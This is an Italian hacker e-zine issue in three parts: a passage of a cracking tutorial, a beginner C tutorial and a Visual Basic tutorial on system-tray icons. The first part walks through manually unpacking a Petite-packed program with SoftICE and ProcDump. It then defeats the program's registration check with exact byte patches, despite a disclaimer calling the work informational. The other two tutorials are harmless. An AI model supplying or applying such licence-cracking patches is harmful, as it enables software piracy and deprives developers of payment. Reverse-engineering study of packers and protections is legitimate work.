microsecondo...se poi disassembliamo il programma, bhè ancora peggio.
Aprite quindi procdump e facendo finta che non esiste il GetTyp provate tutte
le combinazioni dei packer...vedrete che il file viene unpackato da
"petite < 1.3", bene, avviate il file.....dho! Non parte....mmmm sta cosa non
ci piace....io che sono un tipo che non pensa ma agisce (un po' come una
capra) ho detto: "Okkei ti unpacko a mano" ricordandomi solo ora che era
possibile far funzionare il file del procdump solo dopo alcune modifiche...
oki, andiamo avanti.
Aprite adump da un prompt di dos e premete "R", dovreste avere qualcosa di
simile:

:r
Internal variables:
-------------------
STARTOFFS: 0x8423F000 <---Questo ci interessa parecchio
ENDOFFS: 0x84333240
LIMIT: 0xF4240 (1000000 )
CUROFFS: 0x8423F000
MAPFN: C:\WINDOWS\TEMP\ADump.log
MAPFSIZE: 0xF4240
ANFILTER: A..Z,a..z,0..9
:

(mi raccomando non chiudete il programma...il caro adump non fa altro che
mappare in memoria un file di un mega e 0x8423F000 è l'offset di inizio di
questo file...ci servirà dopo per dumpare i dati dell'apispy...aprite l'hex
workshop ed andate all'entrypoint del programma (D400h) sostituite il primo
byte con CCh (è l'opcode di Int3), salvate il tutte ed uscite.....aprite sice
(ctrl+d) mettete un breakpoint sull'interrupt 3 (bpint 3) e chiudete sice,
avviate adesso apisspy e appena sice poppa scrivete: e eip 66
in questo modo rimettete il byte originale al suo posto visto che prima
l'avevamo cambiato in CC, fatto ciò avrete davanti due push ed una chiamata:

:0041A000 CC int 03 <----Questo l'abbiamo settato prima
:0041A001 9C pushfd
:0041A002 60 pushad
:0041A003 E8CA000000 call 0041A0D2 <----Questa è la chiamata che dobbiamo
esaminare
:0041A008 0300 add eax, dword ptr [eax]

entrate nella call con F8 e date vita ad un estenuante step finchè non
arriverete qua

:004055C0 55 push ebp <----Questo è l'entry point originale, ma
l'indirizzo dell'entry lo trovate in
eax (1A000h)
:004055C1 8BEC mov ebp, esp
:004055C3 6AFF push FFFFFFFF
:004055C5 6810804000 push 00408010
:004055CA 6818544000 push 00405418
:004055CF 64A100000000 mov eax, dword ptr fs:[00000000]
:004055D5 50 push eax

Adesso potremmo iniziare il dump visto che siamo arrivati all'entrypoint
originale cioè quello del programma non packato...ma come faccio a dirlo?
In genere i packer arrivano ad un jmp eax e quello significa stanno per
arrivare all'entry originale, in questo caso però non possiamo basarci su
questo "trick" però possiamo notare due cose:

1) Scorrendo il listato in sice vediamo molte api che sicuramente non servono
al packer
2) Guardando la barra verde in basso a sice scopriamo che siamo passati dalla
sezione .madmat alla .text

capito ora? La sezione che ci interessa è sempre la .text o la .CODE, a questo
punto iniziamo il dumping, per prima cosa dobbiamo controllare che tutte le
pagine da dumpare sono in memoria e dobbiamo anche sapere quanti byte dobbiamo
dumpare......arrivati qui scrivete in sice: task
ed avremo la lista di tutte le applicazioni attive, la nostra è ovviamente
api32, quindi scrivete: map32 apis32 ed avrete una lista completa di tutte le
sezioni:

Owner Obj Name Obj# Address Size
Apis32 .text 0001 015F:00401000 Offset: 0000F000
Apis32 .idata 0002 0167:00410000 Offset: 00001000
Apis32 .rsrc 0003 0167:00411000 Offset: 00009000
Apis32 .madmat 0004 015F:0041A000 Offset: 0000D268

per prima cosa calcoliamoci il numero di bytes da dumpare, quindi fate cosi:
Rva ultima sez - imagesize +1000
in sice diventa: ? 41A000-400000+1000 = 1B000

1000 è la lunghezza del PE, quindi il nostro file UNPACKATO sarà lungo
1B000h bytes, adesso vediamo quante pagine di memoria occupa tutto il
programma e sopratutto vediamo quante pagine non sono in memoria, aprite la
calcolatrice di windows e, sapendo che ogni pagina di memoria occupa
4095bytes cioè FFFh scriviamo: lunghezza programma / FFF
1B000/FFF = 1B....il programma occupa 27 pagine di memoria, quindi vediamo se
sono tutte presenti, per questo useremo la funzione "page" partendo
dall'indirizzo 400000:
page 400000 L 1b
bene, bene, se la pagina è presente vedrete qualcosa di simile:

00400000 023a9000 P A U R Private
se invece è assente vedrete: 00400000 NP 023a9000
scorrete tutta la lista e scoprirete che molte pagine non sono presenti, la
prima è 400000, segnatevi tutte quelle assenti su un foglietto e poi scrivete:

pagein 400000
pagein 418000
pageun 419000
pagein 41A000

ripeterete tutto questo per tutte quante le pagine assenti....fatto ciò avremo
il programma bello e pronto da dumpare, per farlo dobbiamo trasferire tutti i
suoi byte dalla memoria al file mappatoci da adump, in questo modo:

m address1 L address2

che per noi diventa: m 400000 L 1B000 8423F000 <---Questo è l'offset che ho
evidenziato poco sopra

bene, adesso andiamo in adump (se l'avete chiuso so' cavoli vostri, dovete
riniziare :) alla riga di comando scrivete:

w c:\unpacked.exe 1B000 8423F000

che significa: scrivi nel file "unpacked.exe" 1B000 bytes che trovi all'offset
8423F000......adesso abbiamo il file unpackato ma non lo runnate che non
funziona, per prima cosa dobbiamo rimettere a posto l'entry originale, quindi
aprite procdump, pe editor, unpacked.exe....bhè l'entry sta a posto è quello
giusto cioè 1A000, ma dobbiamo comunque riallineare il file, quindi clickate
su sections e editate ogni section ponendo la Psize uguale alla Vsize e
l'Offset uguale all'RVA, se in pratica avete questo:

Vsize: 00001000 RVA: 00001000
Psize: 00000940 Offset: 00002567

dovete trasformarlo in questo:

Vsize: 00001000 RVA: 00001000
Psize: 00001000 Offset: 00001000

se avete fatto bene il lavoro per tutte le sezioni ed avete premuto F5 per
aggiornare il desktop vedrete allora riapparire l'icona originale ed il file
funzionerà a meraviglia (le sue dimensioni devo essere: 110.592 bytes)

La prima parte è terminata, adesso possiamo crackare il programma...se avessi
tempo vi farei trovare il seriale ma non posso, vado di fretta...

Per prima cosa premete il pulsante register ed inserite un nick ed un
numero....mettete un bp su getdlgitemtexta (bpx getdlgitemtexta) e poi premete
invio....appena entrati premte F11 e non fermatevi lì, steppate per 16 volte
con F12 ed arriverete qui:

:0040174A push 00409038
:0040174F push 0040D1E0
:00401754 Call lstrcatA
:0040175A push 00409328
:0040175F push 0040D1E0
:00401764 Call lstrcatA
:0040176A call 004046A0

:0040176F A374CE4000 mov [40xxxx], eax <-----Perdonatemi le xxx ma non me lo
ricordo quale era l'indirizzo
:00401774 EB01 jmp 00401777

dopo la chiamata a 4046A0 viene mosso nel buffer il valore riportato da eax
(il solito leim 1 se è esatto e 0 se non lo è), a questo punto proviamo ad
alterare il valore di eax e mettiamoci 1, subito dopo c'è un piccolo trick
SMC che decide se saltare alla beggar off oppure no, eccolo:

:00401774 EB01 jmp 00401777
:00401777 B80AC07402 mov eax, 0274000A
:0040177B EB2C jmp 004017A9

ora ve lo spiego: quel jump vorrebbe saltare all'indirizzo 401777 che come
vedete non è rappresentato ma ovviamente c'è :), il programma allora salta
effettivamente a quell'indirizzo scindendo l'opcode B80AC07402 in:

B8
0AC0
7402

solo che B8 dal significato nullo viene saltato e 0AC0 e 7402 diventano:

:00401774 EB01 mp 00401777
:00401776 B8 BYTE B8 <---Questo byte viene ignorato dal jump
:00401777 0AC0 or al, al <---Al = 0
:00401779 7402 je 0040177D <---Beggar Off
:0040177B EB2C jmp 004017A9

noi non dobbiamo far altro che cambiare non quel byte ma l'sitruzione sopra,
cioè, prendete "mov [40xxxx], eax" e cambiatelo in "mov eax, 1".....quindi
aprite l'exe ed andate nel programma a cercare questi bytes: A374CE4000EB01,
ce ne sono due nel programma e cambiateli in: B801000000EB01 (lo stesso
identico trick lo ritrovate a 401F39, cambiatelo sennò il programma non si
cracka)...Avremmo potuto cambiare direttamente i byte del trick ma non mi
andava :).....e non rompete che il tute lo sto a fare io :)....uscite da sice
e.....track...programm registrato..riavviatelo e riavrete (ovviamente) la
scrittina registered....chiudete il tutto e mettete un break su
RegOpenKeyExA...clickate sul programma e steppate cpn F5 finchè non vedrete
apparire il loghetto conl'ape ancora senza scritte....appena arrivate a
questo punto cancellate i bp, premete F11 ed arrivate qui:

:00404815 03EA add ebp, edx
:00404817 41 inc ecx
:00404818 4E dec esi
:00404819 75DA jne 004047F5
:0040481B 33C0 xor eax, eax
:0040481D 5F pop edi
:0040481E 85ED test ebp, ebp
:00404820 5E pop esi
:00404821 5D pop ebp
:00404822 0F94C0 setz al <---Azzera AL se il flag Z è attivato

dovete solo cambiare quel setz al in "mov al, 1 nop"..ecco l'opcode:
B00190..sostituitelo al nel file ed il programma sarò finalmente crackato.

ciauzzzzzzzzzzzzzz.........Ah, non dimenticatevi dopo il crack di clickare su
register, inserire il vostro nick ed un qualunque numero più lungo di 16
cifre

=] Note finali [=

Grazie tantissime a Neural_noise che mi ha insegnato molto sul manual
unpacking, kill3xx e tutt quanti gli altri...scusate ma ho una fretta
boia.......ciauzzzzzzzzzzzzz

=] Disclaimer [=

Vorrei ricordare che il software va comprato e non rubato, dovete registrare
il vostro prodotto dopo il periodo di valutazione. Non mi ritengo responsabile
per eventuali danni causati al vostro computer determinati dall'uso improprio
di questo tutorial. Questo documento è stato scritto per invogliare il
consumatore a registrare legalmente i propri programmi, e non a fargli fare
uso dei tantissimi file crack presenti in rete, infatti tale documento aiuta
a comprendere lo sforzo immane che ogni singolo programmatore ha dovuto
portare avanti per fornire ai rispettivi consumatori i migliori prodotti
possibili.
Noi reversiamo al solo scopo informativo e di miglioramento del linguaggio
Assembly.
Capitoooooooo????? Bhè credo di si ;))))

---Quequero---

------------------------------------------------------------[ prOgRamMinG ]---
===] C TUTORIAL [=============================================================
-----[ adr3 ]-----------------------------------------------------------------

Sarebbe x beginners.. ma se sapete gia programmare in c e avete voglia di
farvi 4 risate..

PARTE 1: CAXXATE *MOLTO* DI BASE

INGREDIENTI: il mio pc (cioe', quello ke ne resta.. la skeda audio e' da
qualke parte sul pavimento :( ,e il monitor e' in fin di vita..), vi,
3 cicche, skifezze varie da mangiare..

TEMPO DI PREPARAZIONE: 25 min del mio PREZIOSISSIMO TEMPO (hehe) + almeno il
doppio x ritovare il file prima di spedirlo.. :(

AVVERTENZE: 1 dose eccessiva puo causare convulsioni!! [ke poi è il mio
stato "nauturale"] %)

ok, basta kaxxate ora inizio sul 'serio'..
bhe, a dire la verita' questo tute non era previsto xke' ne avevo preparato 1
sul cracking, ma poi ho letto gli articoli di gente moltooo + brava di me e ho
ripiegato sul programming [sisi ma a noi ke ce ne frega?!?]. Vabbe, il
linguaggio non lo presento visto ke almeno di fama lo konoscete tutti.. vero?
[no? kome NO? :P] siccome la teoria non e' proprio il mio massimo inizio
scrivendovi qualkosa di kretino.. Questo programmino stampa solo 3 frasi sullo
skermo..

#include <stdio.h>

main(){
printf("Nella migliore tradizione dei tute..\n");
printf("Il nostro prog dira':\n");
printf("\t\t\tHELLO WORLD!!!\n");
return (0);
}

don't worry ora spiego tutto..
-1 #include <stdio.h> : include [appunto?!] 1 header nel file del programma..
in pratica, rende disponibili al programma tipi, strutture, funzioni etc..
descritte nel file d'include. L'header ke abbiamo karikato qui e' stdio.h e
contiene principalmente funzioni ke si okkupano delle operazioni base di I/O.
Il simbolo # all'inizio della riga indica ke questa riga del codice e' 1
direttiva al preprocessore. (oltre all'#include abbiamo anke, ad esempio il
#define, l' #ifdef, ecc)

-2 main() : e' la dikiarazione della procedura principale del programma,
quella
ke viene automaticamente eseguita all'avvio. La sintassi corretta x la
descrizione di 1 funzione e':

<tipo-funzione> <nome-funzione> (<tipo-1parametro> <1parametro>
<tipo-2parametro>..)

nel nostro kaso, quindi potrebbe -dovrebbe- essere:
int main (void)
il tipo "void" indica 1 funzione ke non ritorna nessun valore e,se messo tra
le
parentesi, ke non accetta parametri. La funzione e', naturalmente, contenuta
nel
blocco tra { e } (ma pure questo vi devo di??)

3-4-5 printf("stringa\n"); : con queste 3 istruzioni stampiamo delle frasi
sullo skermo e, con "\n" aggiungiamo 1 linefeed -andiamo a kapo, in pratica-.
Quel \n e' infatti 1 sequenza di escape, introdotta dal carattere "\"..

aLcUne sEqUeNzE Di eScAPe
\0 codice NULL
\n codice LF (il nostro amiko.. :))
\r codice CR (carriage return)
\t tabulazione orizzontale (abbiamo usato anke questa!! riga 5..)
\v tabulazione verticale (indovinate ke fa?..)

La funzione ke abbiamo usato x la stampa e' la printf(), definta in stdio.h
(l'abbiamo karikato all'inizio.. ) L'output e' tutto quello contenuto tra ""
(naturalmente le sequenze di escape non vengono stampate..)
Nonostante l'apparente semplicita, la printf() e' 1 funzione piuttosto
flessibile xke' ci permette, ad esempio, di formattare l'output e di definire
il dipositivo di uscita (stdout,stderr,stdaux,stdprn..)

6- return (0); : l'istruzione return ci consente di uscire da 1 funzione,
ritornando al kiamante. se la funzione non è dikiarata void possiamo definire
il valore da restituire alla funzione kiamante; questo valore può essere una
costante, una variabile o, in generale, un'espressione (anche una chiamata a
funzione).
Se siamo sotto dos, il valore restituito dalla funzione main viene restituito
direttamente al SO ke lo rende disponibile tramite l'ERRORLEVEL.

[hihi ke roba.. se kontinuo cosi sembrera' quasi ke sappia l'italiano!! :)]

ok.. abbiamo detto ke per dikiarare 1 funzione si deve definirne il "tipo".
anke le variabili del programma sono identificate da 1 nome e dal tipo a cui
appartengono.. In c, ci sono 4 tipi PRIMITIVI -ve li skrivo in ordine
krescente
di dimensione..

char | carattere singolo
int | intero normale
float | virgola mobile a singola precisione
double | virgola mobile a doppia precisione

i tipi primitivi si combinano poi con i qualificatori, cioe unsigned,
short e
long. (vabbe dai, questo supplizio ve lo evito).

[APERTA PARENTESI]
I tipi di dati elementari e le loro dimensioni dipendono molto
dall'arkitettura del sistema. La dimensione di 1 tipo o di 1 variabile è
ricavabile tramite la funzione sizeof(). [ad esempio x arkitettura i386
sizeof(int)=32 bit)]
[KIUSA PARENTESI]

*LE VARIABILI*
Allora.. spero ke tutti sappiate cos'e' 1 variabile.. kome non lo sapete? bhe,
1 variabile e' in sostanza 1 area di memoria di 1 certa dimensione
identificata
da 1 nome, e a cui e' possibile assegnare un valore (definizione moltooo
odiosa, sembro il mio profe di informatica :PP). La sintassi x dichiarare 1
variabile e':

<tipo-variabile> <nome-variabile> (= <valore>);

esempi..
int numero; /* ah.. questo è 1 kommento :) */
int volte_che_ho_riscritto_questa_riga = 5;
char risposta= 's'

Notare ke il carattere assegnato a risposta e' rakkiuso tra ' ' e non tra " "!
Un carattere alfanumeriko rakkiuso tra apici singoli rappresenta infatti 1
kostante carattere. Gli apici doppi rakkiudono invece stringhe, ke sono in
pratika array di caratteri [questa ve la spiego nella seconda parte, se ci
sara
;P]

Ok, ora faccio qualke esempio su ste benedette variabili...

#include <stdio.h>

int main(){
int num=1; /* dikiarazione delle variabili */
char lettera;

printf("Num vale %d\n",num);
num++; /* num e' incrementato di 1*/
printf("Ora invece vale %d\n",num);
lettera='A';
printf("Lettera e' %c, ovvero %d in decimale\n",lettera,lettera);
num=666;
printf("Num e' %d, cioe %X in hex",num, num);
/* num viene stampato in formato sia dec ke hex*/
return (0);
}
[la smettete di ridere?! è solo 1 esempio!! :)]
questo hmm.. BELLISSIMO programma stampa i valori delle variabili num e
lettera in diversi formati.. [bhe, + o -]
Ad esempio, il carattere assegnato alla var lettera apparira kome 'A' o kome
65 a sekonda della specifika di stampa definita.. la metavariabile %d
formattera il valore kome intero signed in base 10, la %c kome carattere
singolo, la %x kome intero unsigned hex..
Avete notato l'istruzione num++ ?? quel ++ dopo la variabile è 1 operatore ke
incrementa il valore di una variabile numerica di 1 unita..

aLcUnI oPeRaToRi (con <v> si intende 1 variabile o cmq 1 valore generiko):
<v>-- decrementa di 1 unita' il valore dell'operando
<v1>+<v2> somma 2 operandi (stessa sintassi x -,*,/)
<v1>%<v2> resto della divisione tra v1 e v2 (in pratika, v1 mod v2)
<v1>&<v2> AND bit x bit
<v1>|<v2> OR bit x bit
<v1>^<v2> XOR bit x bit
~<v> complemento a 1

[hii basta!! ce ne sono altri ma non mi va + di skriverli!!]

*I PUNTATORI*
[Acc.. e mo?!? Aspettate ke penso all'introduzione.. hem.. ]
Ogni variabile, di qualsiasi tipo, rappresenta 1 valore contenuto in una certa
locazione nella memoria del sistema.
Una puntatore ad 1 certa variabile contiene semplicemente tale indirizzo.

esempio [io non c'avrei kapito nulla skritto kosi %|]:

int numero; // variabile di tipo int
int *puntatore; // variabile puntatore (notare l'asterisko!)
...
numero=10;
puntatore=№ // ora puntatore kontiene l'INDIRIZZO di numero
*puntatore=16; // equivale quindi a numero=16

una variabile puntatore e' simile ad una variabile normale, ma viene
dikiarata kon l'aggiunta di 1 *.
Per indicare la posizione in memoria di una variabile si usa il simbolo &.
Per indicare il valore contenuto in un indirizzo di memoria si usa invece il
simbolo *.
Dopo l'istruzione puntatore=&numero, puntatore contiene l'indirizzo di numero.
Dato ke per riferirsi al valore contenuto in un indirizzo di memoria,
usiamo l'*, è indifferente fare:
numero=16; oppure.. *puntatore=16;

esempietto.. [ankora?? BASTAAA]

#include <stdio.h>

int main(){
char lettera;

printf("Scrivi 1 lettera: ");
scanf("%c \n",&lettera);
return 0;
}
scanf() e' la funzione per gestire l'input dalla tastiera definita in stdio..
%c indica alla funzione ke ricevera' in input 1 carattere, da mettere
messo nella locazione di memoria dove si trova numero..
quindi se p=&numero
sarebbe stata la stessa kosa scrivere
scanf("%c \n",&numero); o.. scanf("%c \n",p);

tutto kiaro? spero di si, non credo di saperlo spiegare meglio di kosi :(

tHiS iS tHe eNd!! [mitiko Jim :))]
Quest'affare e' abbastanza lungo da sembrare decente kome 1 parte..
Se avete trovato il tute alquanto kretino.. bhe, io vi avevo avvertito ke
era x beginners, se volete la prossima volta skrivo qualkosa di + tecniko.
Se nonostante la spiegazione continuate a trovarlo cretino e volete
dirmelo in faccia scrivetemi a acidjm@yahoo.it [niente fake-mail o
remailer senno kome faccio a rispondere agli insulti?? :))]
ciauzz,

---adr3---

------------------------------------------------------------[ PrOGrAmMinG ]---
===] IL SUBCLASSING ]=========================================================
-----[ R A M S E S ]----------------------------------------------------------

INDICE
======

1.1.1 | Piccole nozioni iniziali |

2.1.1 | La struttura del messaggio |

3.1.1 | Dal grossoemuscoloso alla TrayNotifyWnd |
- 3.2.1 La Shell_NotifyIcon
- 3.3.1 La struttura di NOTIFYICONDATA

4.1.1 | Inseriamo questa malefica di un'icona |

5.1.1 | Un ulteriore passo |

6.1.1 | L'ultima frontiera |

7.1.1 | I menu |

8.1.1 | Gli esempi |
- 8.2.1 1ø esempio
- - 8.2.2 Perche' l'utilizzo di AddressOf?
- 8.3.1 2ø Esempio
- 8.4.1 3ø Esempio

9.1.1 | Manteniamo la promessa :) |

10.1.1 | How to Contact me |

====
FINE

..............................
1.1.1 Piccole nozioni iniziali
==============================
Salve raga,
questo e' il mio primo testo che scrivo per AIS quindi perdonate se questo
articolo possa diventare noioso.
Cmq cominciamo subito...
Questo testo si prefigge di insegnarvi in modo molto semplice ma nello stesso
tempo completo come inserire l'icone da una qualsiasi delle vostre
applicazioni sulla tray senza modificare il programma stesso (e senza rifarlo)

Prima di tutto bisogna che capiate bene cosa significa cio' che stiamo facendo
e come funziona tutto cio' visto che solo sapere come si fa non serve a molto.
Quando l'utente esegue qualche operazione viene generato un evento.
Questi eventi sono risposte a operazioni svolte da qualcuno sul PC come la
pressione di un tasto. Questi eventi sono il piu' delle volte programmabili
in Visual Basic.

Ad esempio (gli esempi sono sempre difficili per me), se sputi in faccia a
qualcuno lui si incazzera' come una iena incazzosa e ti spacchera' il muso;
quindi possiamo anche scrivere un programma di questo tipo:

listato 1
--------------------------------------------
Private Sub grossoemuscoloso_sputainfaccia()
grossoemuscoloso.incazzaturamode = true
End Sub
--------------------------------------------

Quindi noi abbiamo agito sull'EVENTO:
sputainfaccia()
ed abbiamo settato l'evento generato come:
grossoemuscoloso.incazzaturamode = true

Oltre a questo noi possiamo anche aggiungere cio' che vogliamo per rendere la
nostra applicazione migliore ma questo sta a voi, sbizzarritevi come volete,
ora vi faccio un esempio:

listato 2
--------------------------------------------
Private Sub grossoemuscoloso_sputainfaccia()
grossoemuscoloso.incazzaturamode = true
continue
End Sub

Private Sub continue()
Do While sputatoreresponse <> ""
DoEvents
End Sub
--------------------------------------------

Abbiamo detto quindi all'eventoi settato in precedenza che oltra a doversi
incazzare doveva anche continuare battere lo sputatore finche' la sua
risposta non fosse diversa da "" (quindi non ci fosse risposta eheh).
Spero di essere riuscito a farvi capire come funge la cosa a grandi linee.
Ora rimane ancora qualcusa da stabilire (prima di passare al vero programma)
ossia come si passa dall'azione svolta dall'operatore all'evento da generare?
Bellissima domanda (beh, l'ho fatta io!!!eheh).

La risposta e' semplicissima, come tutto il resto che vedremo se faremo passi
piccoli per volta, al momento della pressione del tasto viene inviato un
messaggio che corrisponde all'evento. La finestra elabora il messaggio e se
lo riconosce (quindi il programma e' corretto) viene generato questo
benedetto evento. Ora cominciamo finalmente la parte piu' tecnica diciamo.

................................
2.1.1 La struttura del messaggio
================================

Il messaggio di cui parlavamo precedentemente ha una sua struttura in VB ed
e' questa:

hWnd ----> Questo e' l'handle della finestra che riceve il messaggio.

Ma cos'e' l'handle?
Ecco la definizione: valore intero univoco definito dall'ambiente operativo e
utilizzato dal programma per identificare e accedere a un oggetto, ad esempio
un form o un controllo. Abbastanza chiaro mi sembra ma piu' semplicemente un
numero che identifica un controllo (cmq dopo vedremo anche un esempio per
capire).

La sua Sintassi e': oggetto.hWnd
Semplicissimo quindi. Per altre informazioni superflue al nostro scopo potete
cmq fare capo all'help in linea di Visual Basic.

uMsg ----> Identificatore dell'evento (messaggio). E' sempre un identificatore
univoco.
wParam --> Ulteriori informazioni.
lParam --> Ulteriori informazioni.

Ora non preoccupatevi di tutto questo perche' lo vedremo in dettaglio e senza
neanche accorgervene lo avrete gia' capito.
Esempio:
Se faccio click col tasto destro (o sinistro per i mancini come me) sul nostro
controllo grossoemuscoloso il messaggio generato sara' di questo tipo:

hWnd ----> grossoemuscoloso.hWnd
uMsg ----> WM_LBUTTONCLCK = 515 (oppure WM_RBUTTONCLCK)

.............................................
3.1.1 Dal grossoemuscoloso alla TrayNotifyWnd
=============================================

La taskbar non e' altro che una finestra di Windows con qualche proprieta'
particolare, infatti e' sempre in pprimo piano, non presenta la caption, non
possiede i pulanti di massimizzazione e minimizzazione e non puo' essere
spostato ovunque nello schermo ma solo lungo i bordi dello stesso.
La sua composizione e' la seguente:

1) Un elemento button (Il pulsante Start o Avvio)
2) Un elemento ToolbarWindow32 (solo per Windows 98 o Windows 95 con
installato Microsoft Internet Explorer 4 o superiore, ossia quella piccola
barra che contiene le icone per una rapida esecuzione dei programmi).
3) Un elemento SysTabControl32 (dove appaiono le finestre correntemente
attive).
4) Un elemento TrayNotifyWnd (ossia cio' che interessa a noi, quella piccola
parte della barra vicina all'orologio di sistema su cui sono poste alcune
icone di programmi che le aggiungono).

Tutte le operazioni che si effettuano e che effettueremo all'interno della
TrayNotifyWnd sono gestite dalla funzione Shell_NotifyIcon il cui prototipo
in VB e':

...........................
3.2.1 - La Shell_NotifyIcon
===========================

listato 3
------------------------------------------------------------------
[Public] [Private] Declare Function Shell_NotifyIcon Lib "shell32"
Alias "Shell_NotifyIconA"
(ByVal dwMessage As Long, pnid As NOTIFYICONDATA) As Boolean
------------------------------------------------------------------

Bella roba vero? eheh
Ora vediamo i parametri che sono insiti in questo prototipo:

dwMessage ----> Identificatore del messaggio che puo' essere uno dei seguenti:

tabella 1 -----------------------------------------------------
| Identificatore |Utilizzo |
-----------------------------------------------------
|NIM_ADD |Aggiunge un'icone nella tray... |
-----------------------------------------------------
|NIM_DELETE |Distrugge un'icone (cancella) |
-----------------------------------------------------
|NIM_MODIFY |Midifica l'icona |
-----------------------------------------------------

ipData -------> E' un puntatore ad una struttura del tipo Notifyicondata

OK, ora sappiamo anche del prototipo di NOTIFYICONDATA, ma ora dobbiamo anche
conoscerne la struttura.

......................................
3.3.1 - La struttura di NOTIFYICONDATA
======================================
Ecco qua la sua struttura:

listato 4
---------------------------------------
[Public] [Private] Type NOTIFYICONDATA
cbSize As Long ------------------> Dimensione della struttura con sintassi:
Len(espressione).
hwnd As Long --------------------> Arridaie', il solito handle.
uID As Long ---------------------> Identificatore dell'icona nella tray.
uFlags As Long ------------------> Serve per indicare quali altre proprieta'
sono stato impostate con volori validi e
puo' essere:

tabella 2
----------------------------------------------------
|Identificatore |Utilizzo |
----------------------------------------------------
|NIF_ICON |Il parametro hIcon e' stato impo -|
| |stato. |
---------------------------------------------------
|NIF_MESSAGE |Il parametro uCallBackMessage e' |
| |stato impostato. |
----------------------------------------------------
|NIF_TIP |Il parametro szTip e' stato impo -|
| |stato. |
----------------------------------------------------

uCallbackMessage As Long --------> Definisce l'identificatore per il messaggio
che il sistema inviera' alla finestra
specificata (identificata dal parametro
hwnd) ogni qual volta vi e' un evento del
mouse all'interno del rettangolo dell'icona

hIcon As Long -------------------> Handle dell'icona che vogliamo modificare,
cancellare o aggiungere.

szTip As String * 64 ------------> Tooltip dell'icona, ossia il testo che
appare in quel rettangolino giallo dopo che
il mouse si sovrappone per qualche secondo
sopra l'icona senza muoversi.

End Type ------------------------> Poco da dire :-)) Da' il fine alla
struttura (potevo anche risparmiarmelo).
---------------------------------------

...........................................
4.1.1 Inseriamo questa malefica di un'icona
===========================================
Bene, ora vi consiglio caldamente di riprendere in mano tutto e di confrontare
con quello che faremo ora, ossia un esempio completo di inserimento di icona
nella tray. Da notare pero' che questo programma inserisce solo l'icona nella
tray senza fare nient'altro. Non si puo' agire sulla tray e non la si puo'
togliere. Ormai cmq il + e' fatto.

Questo programma stupido permette di inserire alla pressione del pulsante
"nonsochenomedargli" un'icona sulla tray.

listato 5
---------------------------------------
Dim nic As NOTIFYICONDATA
Private Declare Function Shell_NotifyIcon Lib "shell32.dll"
Alias "Shell_NotifyIconA" _
(ByVal dwMessage As Long, lpData As NOTIFYICONDATA) As Long
Private Type NOTIFYICONDATA
cbSize As Long
hwnd As Long
uID As Long
uFlags As Long
uCallbackMessage As Long
hIcon As Long
szTip As String * 64
End Type
Private Const NIM_ADD = &H0&
Private Const NIF_MESSAGE = &H1&
Private Const NIF_ICON = &H2&
Private Const NIF_TIP = &H4&
Dim myhandle As Long
Dim icona
Private Const MYTRAY_MESSAGE = &H501&
Private hPrecedente As Long

Private Sub Command1_Click()
'Qui ho messo la chiamata, cmq potevo anche mettere tutto 'insieme e non
sarebbe cambiato 'nulla.
Call Shell_NotifyIcon(NIM_ADD, nic)
End Sub

Private Sub Form_Load()
myhandle = Form1.hwnd
'Assegno alla variabile icona il valore Form1.icon.
icona = Form1.Icon
'Lunghezza.
nic.cbSize = Len(nic)
'Richiamo la variabile precedente. Ho messo 'come icona quella 'del form per
rendere piu' corto possibile il programma.
nic.hIcon = icona
'Gia' lo conosciamo bene.
nic.hwnd = Form1.hwnd
'ToolTip dell'icona nella tray.
nic.szTip = "La mia icona nella TaskBar!" & vbNullChar
'Importante ma lo vedremo poi.
nic.uCallbackMessage = MYTRAY_MESSAGE nic.uFlags =
NIF_MESSAGE + NIF_ICON + NIF_TIP
nic.uID = 1
End Sub
---------------------------------------

Con un form vuoto ed un solo tasto di nome nonsochenomedargli.

Guardate! Ristretto all'osso. Direi che cmq e' anche semplice. In questo modo
potete inserire l'icona, ma questo e' veramente il modo piu' semplice, magari
piu' avanti vi mostrero' metodi piu' avanzati e comodi per scrivere programmi
anche piu' complessi.
Finalmente lo abbiamo capito spero. Ora passiamo oltre, e' praticamente
identico, ma per sicurezza facciamo anche la cancellazione di una icona.

listato 6
---------------------------------------
Dim nic As NOTIFYICONDATA
Private Declare Function Shell_NotifyIcon Lib "shell32.dll"
Alias "Shell_NotifyIconA" _
(ByVal dwMessage As Long, lpData As NOTIFYICONDATA) As Long
Private Type NOTIFYICONDATA
cbSize As Long
hwnd As Long
uID As Long
uFlags As Long
uCallbackMessage As Long
hIcon As Long
szTip As String * 64
End Type
Private Const NIM_DELETE = &H2&
Private Const NIF_MESSAGE = &H1&
Private Const NIF_ICON = &H2&
Private Const NIF_TIP = &H4&
Dim myhandle As Long
Dim icona
Private Const MYTRAY_MESSAGE = &H501&
Private hPrecedente As Long

Private Sub Command1_Click()
'Qui ho messo la chiamata, cmq potevo anche mettere tutto insieme e non
sarebbe cambiato nulla.
Call Shell_NotifyIcon(NIM_DELETE, nic)
End Sub

Private Sub Form_Load()
myhandle = Form1.hwnd
'Assegno alla variabile icona il valore Form1.icon.
icona = Form1.Icon
'Lunghezza.
nic.cbSize = Len(nic)
'Richiamo la variabile precedente. Ho messo 'come icona quella 'del form per
rendere piu' corto possibile il programma.
nic.hIcon = icona
'Gia' lo conosciamo bene.
nic.hwnd = Form1.hwnd
'ToolTip dell'icona nella tray.
nic.szTip = "La mia icona nella TaskBar!" & vbNullChar
'Importante ma lo vedremo poi.
nic.uCallbackMessage = MYTRAY_MESSAGE nic.uFlags =
NIF_MESSAGE + NIF_ICON + NIF_TIP
nic.uID = 1
End Sub
---------------------------------------

Chiaramente il delete ha senso solo se l'icona e' gia' presente. Quindi
normalmente o c'e' anche ADD oppure niente DELETE.

........................
5.1.1 Un ulteriore passo
========================
OK, spero che ora siate riusciti a fare entrambe le cose. Una volta fatto cio'
avere l'icona di quel programma nella tray non ha assolutamente nessuna
utilita' (anzi). Per renderlo utile bisognerebbe almeno fare qualcosa tipo un
tasto la cui pressione determina la creazione dell'icona (come prima) ma
anche la sparizione del form:

listato 7
---------------------------------------
Private Sub nonsochenomedargli_Click()
'Questo considerato che tutto il resto sia gia' stato scritto 'altrove.
Call Shell_NotifyIcon(NIM_ADD, unavariabileacaso)
ilvostroform.visible = false
End Sub
---------------------------------------

Ecco, qui c'e' un minimo di utilita'. Pero' ora, se uno volesse diciamo vedere
il rivedere il form? Semplicissimo si potrebbe dire:

listato 8
---------------------------------------
Private Sub nonsochenomedargli_Click()
'Questo considerato che tutto il resto sia gia' stato scritto 'altrove.
Call Shell_NotifyIcon(NIM_ADD, unavariabileacaso
ilvostroform.visible = true
End Sub
---------------------------------------

